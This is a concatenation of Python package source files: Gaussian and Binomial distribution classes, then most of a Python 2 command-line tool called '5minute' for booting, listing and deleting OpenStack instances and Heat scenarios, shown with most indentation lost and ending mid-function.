tmp = min_range + interval*i
x.append(tmp)
y.append(self.pdf(tmp))
# make the plots
fig, axes = plt.subplots(2,sharex=True)
fig.subplots_adjust(hspace=.5)
axes[0].hist(self.data, density=True)
axes[0].set_title('Normed Histogram of Data')
axes[0].set_ylabel('Density')
axes[1].plot(x, y)
axes[1].set_title('Normal Distribution for \n Sample Mean and Sample Standard Deviation')
        axes[1].set_ylabel('Density')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Gaussian distributions
Args:
other (Gaussian): Gaussian instance
Returns:
Gaussian: Gaussian distribution
"""
result = Gaussian()
result.mean = self.mean + other.mean
result.stdev = math.sqrt(self.stdev ** 2 + other.stdev ** 2)
return result
def __repr__(self):
"""Function to output the characteristics of the Gaussian instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}".format(self.mean, self.stdev) | 5kodds-distribution | /5kodds_distribution-0.1.tar.gz/5kodds_distribution-0.1/distributions/Gaussiandistribution.py | Gaussiandistribution.py |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
    """
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
            None: updates p, n, mean and stdev in place
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
try:
assert self.p == other.p, 'p values are not equal'
except AssertionError as error:
raise
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}, p {}, n {}".\
format(self.mean, self.stdev, self.p, self.n) | 5kodds-distribution | /5kodds_distribution-0.1.tar.gz/5kodds_distribution-0.1/distributions/Binomialdistribution.py | Binomialdistribution.py |
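

if __name__ == "__main__":
    # Minimal usage sketch (illustrative): p and n are passed to the
    # constructor; the mean and standard deviation are derived from them.
    # Run as a module (python -m ...) so the relative import above resolves.
    coin = Binomial(0.4, 20)
    print(coin)          # mean 8.0, standard deviation ~2.19, p 0.4, n 20
    print(coin.pdf(8))   # probability of exactly 8 successes, approximately 0.18
    combined = Binomial(0.4, 20) + Binomial(0.4, 60)
    print(combined)      # p stays 0.4, n becomes 80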
# -*- coding: utf8 -*-
import getopt
import os
import sys
import re
import termios
import fcntl
import subprocess
import urllib2
import random
import time
import math
import traceback
import urllib
from prettytable import PrettyTable
import socket
try:
from keystoneclient.v2_0 import client as keystone_client
from cinderclient import client as cinder_client
from cinderclient import exceptions as cinder_exceptions
from heatclient import client as heat_client
from heatclient import exc as heat_exceptions
from neutronclient.neutron import client as neutron_client
from novaclient import client as nova_client
from novaclient import exceptions as nova_exceptions
from keystoneclient.auth.identity import v2 as keystoneIdentity
from keystoneclient import session as keystoneSession
import xmltodict
except ImportError, ie:
sys.stderr.write(ie.message+"\n")
sys.exit(1)
try:
# Python 2.7
from functools import wraps
except:
# Python 2.4
from backports.functools import wraps
CONF_DIR = '~/.5minute'
USER = os.environ["USER"]
DEBUG = False
DISABLE_CATCH = False
PROGRESS = None
# -----------------------------------------------------------
# Helpers functions
# -----------------------------------------------------------
def die(message, excode=1, exception=None):
"""
    Print an error message to stderr and exit.
:param message: message
:param excode: exitcode
:param exception: exception for debugging mode
"""
global PROGRESS
if PROGRESS is not None:
progress(result="\x1b[31;01mFAIL\x1b[39;49;00m")
global DEBUG
if exception and DEBUG:
exc_type, exc_value, exc_traceback = sys.exc_info()
sys.stderr.write("\n\x1b[92;01m")
traceback.print_tb(exc_traceback)
sys.stderr.write("\x1b[39;49;00m\n")
sys.stderr.write("\n\x1b[31;01m%s\x1b[39;49;00m\n\n" % message)
sys.exit(excode)
def warning(message, answer=None):
"""
    Print a warning message to stderr and optionally wait for an answer.
:param message: message
:param answer: list of supported options. Default is first item.
"""
c = ""
sys.stderr.write("\n\x1b[92;01m%s " % message)
if answer:
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
try:
while 1:
try:
c = sys.stdin.read(1)
break
except IOError:
pass
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
c = (u"%s" % c).lower()
sys.stderr.write(" %s\x1b[39;49;00m\n\n" % c)
if answer:
for it in answer:
if c in it:
return c
return answer.pop(0)
def progress(title=None, result=None):
"""
    Function for displaying a progress bar.
    Example of use:
progress(title="Name of action")
for i in range(0, 30):
progress()
progress(result="GOOD")
"""
CHARS = ('.', '-', '=', '_')
global PROGRESS
if title:
PROGRESS = 0
sys.stdout.write("%s" % title.ljust(40, " "))
if result:
sys.stdout.write("%s\x1b[92;01m%s\x1b[39;49;00m\n" %
("\b" * (PROGRESS % 20), result.ljust(20, " ")))
PROGRESS = None
if title is None and result is None:
PROGRESS += 1
if PROGRESS % 20 == 0:
sys.stdout.write("\b" * 19)
PROGRESS += 1
sys.stdout.write(CHARS[int(math.ceil(PROGRESS / 20)) % len(CHARS)])
sys.stdout.flush()
def catch_exception(text=None, type=Exception):
""" Decorator for catch exception """
def decorate(func):
@wraps(func)
def wrapper(*args, **kwargs):
catch_message = text
try:
return func(*args, **kwargs)
except type as ex:
if not DISABLE_CATCH:
if catch_message is None:
catch_message = ex.message
die(catch_message, exception=ex)
else:
raise ex
return wrapper
return decorate
class disable_catch_exception:
""" Disbale decorator for catch exception. """
def __enter__(self):
global DISABLE_CATCH
DISABLE_CATCH = True
def __exit__(self, type, value, traceback):
global DISABLE_CATCH
DISABLE_CATCH = False
def get_FQDN_from_IP(ip):
# If we want to support old version of OpenStack, we have to update this function and
# solve it via serviceman
return "host-{1}-{2}-{3}.host.centralci.eng.rdu2.redhat.com".format(*ip.split("."))
# -----------------------------------------------------------
# Classes
# -----------------------------------------------------------
class BaseClass(object):
__nova = None
__keystone = None
__cinder = None
__heat = None
__token = None
__neutron = None
__first_check = False
__tmpconf = "/tmp/5minute.conf"
__profiles = "profiles/"
_scenarios = "./vminute/scenarios/"
__check_env_done = False
@catch_exception(
"The configuration file ~/.5minute/config does not exist.\n"
"Please download the OpenStack RC file from OpenStack WebUI (Access & Security > API Access "
"> Download OpenStack RC file) and save it to ~/.5minute/config.\n")
def __load_configuration(self):
if not os.path.isfile(self.__tmpconf):
subprocess.check_call("source {config_loc}/config; env | grep OS_ >> {tmpfile}"
.format(config_loc=CONF_DIR, tmpfile=self.__tmpconf), shell=True)
lines = []
with open(os.path.expanduser(self.__tmpconf), "r") as fd:
lines = fd.readlines()
rx2 = re.compile(r'^\s*([A-z_]*)="?([^"]*)"?\s*$')
for it in lines:
res = rx2.search(it)
if res:
key, value = res.groups()
os.environ[key] = value.strip()
def __checkenv(self):
if self.__check_env_done:
return
if not os.environ.get('OS_AUTH_URL') or \
not os.environ.get('OS_TENANT_NAME') or \
not os.environ.get('OS_USERNAME') or \
not os.environ.get('OS_PASSWORD'):
if not self.__first_check:
self.__load_configuration()
self.__first_check = True
self.__checkenv()
else:
die("The configuration file %s/config doesn't contain all important variables.\n" % CONF_DIR)
self.__profiles = "%s/%s" % (CONF_DIR, self.__profiles)
if not os.path.isdir(os.path.expanduser(self.__profiles)):
try:
os.makedirs(os.path.expanduser(self.__profiles))
except OSError:
die("The problem with creating of folder '%s'." % self.__profiles)
self.__scenarios = "%s/%s" % (CONF_DIR, self.__scenarios)
if not os.path.isdir(os.path.expanduser(self.__scenarios)):
try:
os.makedirs(os.path.expanduser(self.__scenarios))
except OSError:
die("The problem with creating of folder '%s'." % self.__scenarios)
self.__check_env_done = True
@catch_exception("Your SSL pub-key is not yet uploaded on the server. "
"Please use: 5minute key ~/.ssh/id_dsa.pub")
def _check_key(self):
self.nova.keypairs.get(USER)
@catch_exception("Problem with connection to OpenStack. Please, check the configuration file "
"~/.5minute/config. (maybe OS_PASSWORD is not explicite value or is not set up in env)")
def __check_connection(self):
try:
self.__nova.authenticate()
except Exception as ex:
os.remove(self.__tmpconf)
raise ex
def __get_cinder(self):
if not self.__cinder:
self.__checkenv()
self.__cinder = cinder_client.Client(1,
os.environ.get('OS_USERNAME'),
os.environ.get('OS_PASSWORD'),
os.environ.get('OS_TENANT_NAME'),
os.environ.get('OS_AUTH_URL'))
return self.__cinder
def __get_heat(self):
if not self.__heat:
self.__checkenv()
endpoint = self.__get_endpoint('orchestration')
self.__heat = heat_client.Client(1, endpoint=endpoint, token=self.token)
return self.__heat
def __get_keystone(self):
if not self.__keystone:
self.__checkenv()
self.__keystone = keystone_client.Client(username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
tenant_name=os.environ.get('OS_TENANT_NAME'),
auth_url=os.environ.get('OS_AUTH_URL'))
return self.__keystone
def __get_nova(self):
if self.__nova:
return self.__nova
self.__checkenv()
self.__nova = nova_client.Client(2,
username=os.environ.get('OS_USERNAME'),
api_key=os.environ.get('OS_PASSWORD'),
project_id=os.environ.get('OS_TENANT_NAME'),
auth_url=os.environ.get('OS_AUTH_URL'))
self.__check_connection()
return self.__nova
def __get_token(self):
if not self.__token:
self.__checkenv()
auth = keystoneIdentity.Password(username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
tenant_name=os.environ.get('OS_TENANT_NAME'),
auth_url=os.environ.get('OS_AUTH_URL'))
session = keystoneSession.Session(auth=auth)
self.__token = auth.get_token(session)
return self.__token
def __get_neutron(self):
if not self.__neutron:
self.__checkenv()
endpoint = self.__get_endpoint('network')
self.__neutron = neutron_client.Client('2.0', endpoint_url=endpoint, token=self.token)
return self.__neutron
def __get_endpoint(self, name):
endpoints = self.keystone.service_catalog.get_endpoints()
if name not in endpoints:
die("This endpoint '%s' is not known" % name)
return endpoints.get(name)[0]['publicURL']
def __getattr__(self, name):
if name == 'cinder':
return self.__get_cinder()
elif name == 'heat':
return self.__get_heat()
elif name == 'nova':
return self.__get_nova()
elif name == 'keystone':
return self.__get_keystone()
elif name == 'token':
return self.__get_token()
elif name == 'neutron':
return self.__get_neutron()
return None
@catch_exception("The problem with parsing of profile XML file. ")
def __get_scenario(self, filename):
xml = None
try:
xml = urllib2.urlopen('https://example.com/scenarios/%s' % filename).read()
except:
warning("This profile '%s' doesn't exist." % filename)
return dict()
return xmltodict.parse(xml)
def cmd(self, argv):
self.help()
def help(self):
print """
Usage: 5minute <-d|--debug> [COMMAND]
Manager for your openstack machines.
OPTIONS:
-d, --debug - enable debugging mode.
COMMANDS:
help - this help
key - upload your SSL key on the server
images - the list of accessible images
flavor - the list of flavors
list - the list of instances
delete - delete a guest
boot - create a new guest
scenario - working with scenarios
Examples:
5minute help
5minute key ~/.ssh/id_dsa.pub
5minute images
5minute images -h
5minute images --all
5minute images satellite
5minute flavor
5minute list
5minute list --all
5minute list satellite
5minute boot --help
5minute boot 5minute-RHEL6
5minute boot --name myRHEL6 5minute-RHEL6
5minute scenarios --help
"""
class KeyClass(BaseClass):
@catch_exception("The problem with uploading of public key.")
def __upload_key(self, key):
if not os.access(key, os.R_OK):
die("SSL key '%s' is not readable." % key)
with open(key) as fd:
self.nova.keypairs.create(USER, fd.read())
print "The key %s was successfully uploaded." % key
def cmd(self, argv):
if len(argv) == 0 or argv[0] in ('help', '--help', '-h'):
self.help()
else:
self.__upload_key(argv[0])
def help(self):
print """
Usage: 5minute key <SSL-PUB-KEY>
Upload your SSL key on the OpenStack server.
Examples:
5minute key ~/.ssh/id_dsa.pub
"""
class ImagesClass(BaseClass):
__filter = "5minute-"
@catch_exception("The problem getting list of images.")
def __images(self):
images = self.nova.images.list()
x = PrettyTable(["Name", "ID", "Status"])
x.align["Name"] = "l"
rx = re.compile(self.__filter, re.IGNORECASE)
for img in images:
if rx.search(img.name):
row = [img.name, img.id, img.status]
x.add_row(row)
print x.get_string(sortby="Name")
def cmd(self, argv):
if len(argv) > 0:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
elif argv[0] in ('--all', '-a'):
self.__filter = ""
else:
self.__filter = argv[0]
self.__images()
def help(self):
print """
Usage: 5minute images [PARAM]
Show the list of accessible images. By default, it shows only 5minute images.
PARAM:
-a, --all show all accessible images
<REGEXP> we can use a regular expression for the filtering of the result
Examples:
5minute images
5minute images --all
5minute images satellite
5minute images fedora
"""
class FlavorClass(BaseClass):
@catch_exception("The problem getting list of flavors.")
def __flavors(self):
flavors = self.nova.flavors.list()
x = PrettyTable(["Name", "CPU", "RAM", "HDD", "ephemeral", "swap"])
x.align["Name"] = "l"
for flav in flavors:
row = [flav.name, flav.vcpus,
"%s MB" % flav.ram,
"%s GB" % flav.disk,
"%s GB" % flav.ephemeral,
"%s MB" % flav.swap if flav.swap else ""]
x.add_row(row)
print x
def cmd(self, argv):
if len(argv) > 0:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
self.__flavors()
def help(self):
print """
Usage: 5minute flavors
Show the list of accessible flavors.
Examples:
5minute flavors
"""
class ServerClass(BaseClass):
@catch_exception("The instance doesn't exist.", nova_exceptions.NotFound)
@catch_exception("The name of the instance is ambiguous, please use ID.", nova_exceptions.NoUniqueMatch)
def get_instances(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.nova.servers.find(name=id)
else:
return self.nova.servers.get(id)
@catch_exception("The image doesn't exist.", nova_exceptions.NotFound)
@catch_exception("The name of the image is ambiguous, please use ID.", nova_exceptions.NoUniqueMatch)
def get_image(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.nova.images.find(name=id)
else:
return self.nova.images.get(id)
@catch_exception("The volume doesn't exist.", cinder_exceptions.NotFound)
@catch_exception("The name of the volume is ambiguous, please use ID.", cinder_exceptions.NoUniqueMatch)
def get_volume(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.cinder.volumes.find(name=id)
else:
return self.cinder.volumes.get(id)
@catch_exception("The snapshot doesn't exist.")
def get_snapshot(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.cinder.volume_snapshots.find(display_name=id)
else:
return self.cinder.volume_snapshots.get(id)
@catch_exception("The flavor doesn't exist.", nova_exceptions.NotFound)
@catch_exception("The flavor is ambiguous, please use ID.", nova_exceptions.NoUniqueMatch)
def get_flavor(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.nova.flavors.find(name=id)
else:
return self.nova.flavors.get(id)
@catch_exception("The problem with getting of the list of networks.")
def get_networks(self, filter=None):
def test_net(net, filter):
if filter is None:
return True
for key, val in filter.items():
if isinstance(val, str):
if re.search(val, net.get(key, "")) is None:
return False
elif val != net.get(key):
return False
return True
res = list()
for net in self.neutron.list_networks()['networks']:
if test_net(net, filter) and len(net.get('subnets')) > 0:
res.append(net)
return res
def get_stable_private_network(self):
def get_count_free_ip(cidr, flist):
address_size = 32
ip_pool_mask = int(cidr.split("/")[1])
ip_pool_bit_size = address_size - ip_pool_mask
max_pool_size = 2 ** ip_pool_bit_size - 2
return max_pool_size - len([ip_addr for ip_addr in flist if
ip_addr.pool == cidr and ip_addr.instance_id])
nets = self.get_networks(filter={'name': "^default-", "router:external": False})
max_network_space = 0
current_biggest_network = None
flist = self.nova.floating_ips.list()
res = list()
for net in nets:
pub_net = self.__get_external_for_private_network(net)
if pub_net:
sub = self.neutron.list_subnets(id=net['subnets'].pop(0))
if len(sub.get('subnets')) > 0:
cidr = sub['subnets'][0]['cidr']
network_free_space = get_count_free_ip(cidr, flist)
if network_free_space > max_network_space:
max_network_space = network_free_space
res = list()
res.append({'private': net, 'free_ip': network_free_space, 'public': pub_net})
elif network_free_space > 0 and network_free_space == max_network_space:
res.append({'private': net, 'free_ip': network_free_space, 'public': pub_net})
return random.choice(res)
def __get_external_for_private_network(self, pnet):
"""
This function returns public network for private network,
if the router is present between these nets.
"""
ports = self.neutron.list_ports(network_id=pnet['id'], device_owner="network:router_interface").get('ports')
if len(ports) == 0:
return None
router = self.neutron.show_router(ports.pop(0)['device_id'])
return self.neutron.show_network(router['router']['external_gateway_info']['network_id'])['network']
def cmd(self, argv):
pass
def help(self):
pass
class ListInstancesClass(ServerClass):
"""
    This is only a view on the ServerClass for listing instances.
"""
def cmd(self, argv):
filter = None
if len(argv) == 0:
filter = "%s-" % USER
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
elif argv[0] not in ('--all', '-a'):
filter = argv[0]
self.list_instances(filter)
@catch_exception("The problem with getting of the list of instances.")
def list_instances(self, filter):
instances = self.nova.servers.list(search_opts={"name": filter})
x = PrettyTable(["Name", "ID", "Status", "FQDN"])
x.align["Name"] = "l"
x.align["FQDN"] = "l"
for ins in instances:
row = [ins.name, ins.id, ins.status, ins.metadata.get('fqdn', "")]
x.add_row(row)
print x.get_string(sortby="Name")
def help(self):
print """
Usage: 5minute list [PARAM]
Show the list of instances. By default, it shows only your instances.
PARAM:
-a, --all show all accessible instances
<REGEXP> we can use a regular expression for the filtering of the result
Examples:
5minute list
5minute list --all
5minute list satellite
5minute list fedora
"""
class DeleteInstanceClass(ServerClass):
"""
    This is only a view on the ServerClass for deleting an instance.
"""
def cmd(self, argv):
if len(argv) == 0:
die("Missing parameter. Please try 5minute delete <name|id>.")
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
else:
self.kill_instances(argv[0])
# @catch_exception("The problem deleting of the instances.")
def kill_instances(self, id):
server = self.get_instances(id)
progress(title="Release floating IP:")
        # Removing the floating IPs first also works as a crude check for an activated instance lock
fips = self.nova.floating_ips.findall(instance_id=server.id)
for fip in fips:
server.remove_floating_ip(fip.ip)
progress(result="DONE")
vols = self.nova.volumes.get_server_volumes(server.id)
if len(vols) > 0:
progress(title="Release volumes:")
for vol in vols:
progress()
cvol = self.cinder.volumes.get(vol.id)
self.cinder.volumes.begin_detaching(cvol)
progress(result="DONE")
progress(title="Delete instance:")
done = False
try:
server.delete()
done = True
while len(self.nova.servers.findall(id=server.id)) > 0:
time.sleep(1)
progress()
progress(result="DONE")
except Exception as e:
if 'locked' in e.message:
progress(result="\x1b[31;01mLOCKED\x1b[39;49;00m")
else:
progress(result="FAIL")
for fip in fips:
if done:
self.nova.floating_ips.delete(fip.id)
else:
server.add_floating_ip(fip.ip)
for vol in vols:
cvol = self.cinder.volumes.get(vol.id)
if done:
progress(title="Delete volume:")
cvol.delete()
while len(self.cinder.volumes.findall(id=cvol.id)) > 0:
time.sleep(1)
progress()
progress(result="DONE")
else:
self.cinder.volumes.roll_detaching(cvol)
def help(self):
print """
Usage: 5minute (del|kill|delete) <NAME|ID>
Delete instance.
PARAM:
<NAME|ID> Name or ID of instance
Examples:
5minute delete 5minute-RHEL6
5minute kill 5minute-RHEL6
"""
class BootInstanceClass(ServerClass):
"""
    This is only a view on the ServerClass for booting an instance.
"""
ufile = ""
default_flavor = "m1.medium"
variables = None
created_volume = False
def __parse_params(self, opts, argv):
params = {}
for key, val in opts:
if key in ('--help', '-h') or 'help' in argv:
params['help'] = True
return params
elif key in ('--flavor', '-f'):
params['flavor'] = self.get_flavor(val)
elif key in ('--console', '-c'):
params['console'] = True
elif key in ('--name', '-n'):
params['name'] = "%s-%s" % (USER, val)
elif key in ('--volume', '-v'):
params['volume'] = val
elif key in ('--profile', '-p'):
params['profile'] = val
elif key == '--novolume':
params['novolume'] = True
elif key == '--noip':
params['noip'] = True
elif key == '--userdata':
params['userdata'] = val
else:
die("Bad parameter '%s'. Please try 5minute boot --help." % key)
if len(argv) != 1:
die("The name of image is ambiguous or empty.")
params['image'] = self.get_image(argv.pop(0))
self.add_variable('image', params['image'].name)
self.add_variable('image_id', params['image'].id)
if 'name' not in params:
params['name'] = "%s-%s" % (USER, params['image'].name)
self.add_variable('name', params['name'])
return params
@catch_exception("Bad parameter. Please try 5minute boot --help.")
def cmd(self, argv):
opts, argv = \
getopt.getopt(argv, "hcf:n:v:p:",
['help', 'console', 'flavor=', 'name=', 'volume=', 'userdata=',
'novolume', 'noip'])
self.params = self.__parse_params(opts, argv)
if 'help' in self.params:
self.help()
return 0
self.boot_instance()
def add_variable(self, key, val):
if not self.variables:
self.variables = dict()
self.variables[key] = val
def __release_resources(self):
if "floating-ip" in self.variables and \
self.variables.get("floating-ip"):
self.nova.floating_ips.delete(self.variables['floating-ip'])
if self.created_volume:
cvol = self.cinder.volumes.get(self.volume.id)
cvol.detach()
cvol.delete()
@catch_exception()
def boot_instance(self):
self._check_key()
with disable_catch_exception():
try:
self.__setup_networking()
self.__setup_volume(self.params['image'])
self.__setup_userdata_script(self.params['image'])
self.__choose_flavor(self.params['image'])
self.__create_instance(self.params['image'])
except Exception, ex:
self.__release_resources()
die(str(ex), exception=ex)
def help(self):
print """
Usage: 5minute boot [PARAM] <IMAGE-NAME|IMAGE-ID>
Boot new instance.
PARAM:
-n, --name name of the instance
-f, --flavor name of flavor
-v, --volume the volume snapshot (default: 5minute-satellite5-rpms)
--novolume no volume snapshot
-c, --console display the console output during booting
--userdata the paths or URLs to cloud-init scripts
Examples:
5minute boot 5minute-RHEL6
"""
def __setup_networking(self):
        progress(title='Choosing the private network:')
network = self.get_stable_private_network()
progress(result=network['private']['name'])
progress(title='Obtaining a floating IP:')
floating_ip = self.nova.floating_ips.create(network['public']['id'])
if not floating_ip:
raise Exception("The problem with getting of IP address.")
self.add_variable('floating-ip', floating_ip)
self.add_variable('private-net', network['private']['id'])
progress(result=floating_ip.ip)
progress(title='Obtaining a domain name:')
hostname = get_FQDN_from_IP(floating_ip.ip)
if not hostname:
raise Exception("The problem with getting of DNS record.")
self.add_variable('hostname', hostname)
progress(result=hostname)
# @catch_exception("The problem with downloading of the userdata script for this image")
def __setup_userdata_script(self, image):
res = None
filenames = None
if "userdata" in self.params:
filenames = self.params['userdata']
elif "cscripts" in image.metadata:
filenames = image.metadata['cscripts']
if filenames:
progress(title='Loading the userdata script:')
self.params['cscript'] = ""
for filename in filenames.split():
cscript = urllib.urlopen(filename).read()
self.params['cscript'] += cscript.format(**self.variables)
self.params['cscript'] += "\n"
progress(result="DONE")
def __setup_volume(self, image):
self.volume = None
if not self.params.get('novolume', False):
volume_name = self.params.get('volume')
if volume_name is None:
volume_name = image.metadata.get('volumes')
if volume_name:
# Is the volume_name name/id of existing volume?
try:
self.volume = self.get_volume(volume_name)
except cinder_exceptions.NotFound as ex:
pass
if self.volume is None:
# The volume_name is name of snapshot,
# we create new volume from it
self.volume = self.__create_new_volume(volume_name, image)
def __create_new_volume(self, volume_name, image):
progress(title="Creating a new volume:")
snap = self.get_snapshot(volume_name)
name = self.params.get('name', "%s-%s" % (USER, image.name))
vol = self.cinder.volumes.create(size=snap.size, snapshot_id=snap.id,
display_name=name)
while vol.status == 'creating':
progress()
time.sleep(1)
vol = self.get_volume(vol.id)
if vol.status == 'error':
raise Exception("The problem with creating of the volume.")
progress(result="DONE")
self.created_volume = True
return vol
def __choose_flavor(self, image):
progress(title="Used flavor:")
if 'flavor' not in self.params:
if 'default_flavor' in image.metadata:
self.params['flavor'] =\
self.get_flavor(image.metadata.get('default_flavor'))
if self.params.get('flavor') is None:
self.params['flavor'] =\
self.get_flavor(self.default_flavor)
flavor = ("{name} (RAM: {ram} MB, vCPU: {vcpus}, disk: {disk} GB)")\
.format(**self.params['flavor'].__dict__)
progress(result=flavor)
def __create_instance(self, image):
progress(title="Instance name:", result=self.params.get('name'))
progress("Creating a new instance:")
param_dict = {'name': self.params.get('name'),
'image': image.id,
'flavor': self.params.get('flavor').id,
'key_name': USER,
'nics': [{'net-id': self.variables['private-net']}],
'meta': {'fqdn': self.variables["hostname"]},
'security_group': ['satellite5'],
'config_drive': True}
if self.volume:
param_dict['block_device_mapping'] = {'vdb': self.volume.id}
# print(param_dict)
if "cscript" in self.params:
param_dict['userdata'] = self.params['cscript']
server = self.nova.servers.create(**param_dict)
status = server.status
while status == 'BUILD':
time.sleep(1)
progress()
status = self.nova.servers.get(server.id).status
# print server.progress
if status == 'ACTIVE':
progress(result="DONE")
else:
progress(result="FAIL")
if "floating-ip" in self.variables:
server.add_floating_ip(self.variables['floating-ip'])
self.__check_console_output(server)
def __check_console_output(self, server):
lindex = 0
show_output = self.params.get('console')
exit_status = None
exit_message = "DONE"
counter = 60
reg_login = re.compile(r".*login:\s*$")
reg_warning = re.compile(r"(warning)", re.I)
reg_error = re.compile(r"(error)", re.I)
if show_output:
print "Booting of the instance:"
else:
progress(title="Booting of the instance:")
output = server.get_console_output().splitlines()
while counter > 0 and exit_status is None:
nindex = len(output) - 1
if lindex >= nindex:
counter -= 1
else:
counter = 60
for line in output[lindex:]:
patern = "%s\n"
if reg_login.match(line):
counter = 0
if exit_status is None:
exit_status = True
break
if reg_warning.search(line):
patern = "\x1b[92;01m%s\x1b[39;49;00m\n"
if reg_error.search(line):
patern = "\x1b[31;01m%s\x1b[39;49;00m\n"
exit_message = "Errors in the userdata script"
if show_output:
sys.stdout.write(patern % line)
else:
progress()
time.sleep(1)
lindex = nindex + 1
if exit_status is None:
output = server.get_console_output(30).splitlines()
if not show_output:
progress(result=exit_message)
if exit_status is None:
exit_status = False
return exit_status
class ScenarioClass(ServerClass):
"""
    Class for working with scenarios
"""
@staticmethod
def getInstance(subcmd):
if subcmd == 'list':
return ListScenarioClass()
elif subcmd == 'templates':
return TemplateScenarioClass()
elif subcmd == 'boot':
return BootScenarioClass()
elif subcmd in ('del', 'delete', 'kill'):
return DeleteScenarioClass()
else:
return ScenarioClass()
def cmd(self, argv):
self.help()
return 0
@catch_exception("The scenario doesn't exist.", heat_exceptions.NotFound)
def get_scenario(self, id):
return self.heat.stacks.get(id)
def help(self):
print """
Usage: 5minute scenarios <COMMAND> [PARAM]
Managing scenarios
COMMAND:
help - show this help
templates - show the list of templates
list - show the list of scenarios
boot - create new scenario/stack
del|kill - delete scenario
Examples:
5minute scenarios help
5minute scenarios templates
5minute scenarios list
5minute scenarios boot template1
5minute scenarios boot --name myscenario template1
5minute scenarios del myscenario
"""
class TemplateScenarioClass(ScenarioClass):
def __get_list_templates(self):
templates = list()
folder = os.path.expanduser(self._scenarios)
for file in os.listdir(folder):
if file.endswith(".yaml"):
templates.append(re.sub(r'\.yaml$', '', file))
return templates
def cmd(self, argv):
if len(argv) > 0 and argv.pop(0) in ('help', '--help', '-h'):
self.help()
return 0
else:
x = PrettyTable(["Name", ])
x.align["Name"] = "l"
for row in self.__get_list_templates():
x.add_row([row, ])
print x.get_string(sortby="Name")
def help(self):
print """
Usage: 5minute scenarios templates
Show the list of available templates
Examples:
5minute scenarios templates
"""
class BootScenarioClass(ScenarioClass):
@catch_exception("Bad parameter. Please try 5minute scenario boot --help.")
def cmd(self, argv):
params = dict()
opts, argv2 = getopt.getopt(argv, "n:h", ['name=', 'help'])
for key, val in opts:
if key in ('--help', '-h'):
self.help()
return
elif key in ('--name', '-n'):
params['name'] = val
else:
die("Bad parameter '%s'. Please try 5minute scenario boot --help." % key)
if len(argv2) != 1:
die("You have to set name of template. Please try 5minute scenario boot --help.")
template_name = argv2.pop(0)
if template_name == 'help':
self.help()
return
params['template_name'] = template_name
params['template'] = self.__get_template(template_name)
self._check_key()
        self.__create_stack(params)
@catch_exception("Error: Problem with the loading of the template.")
def __get_template(self, name):
template = None
with open(os.path.expanduser("{folder}/{template}.yaml".format(folder=self._scenarios,
template=name)), 'r') as tmd:
template = tmd.read()
return template
    def __create_stack(self, params):
        progress(title="Creating the scenario:")
params['name'] = "%s-%s" % (USER, params['template_name'] if 'name' not in params else params['name'])
current_biggest_network, free_ips = self.get_network()
stack = self.heat.stacks.create(stack_name=params['name'], template=params['template'], parameters={
'key_name': USER,
'image': 'RHEL-6.5-Server-x86_64-released',
'flavor': 'm1.medium',
'public_net': current_biggest_network['id'],
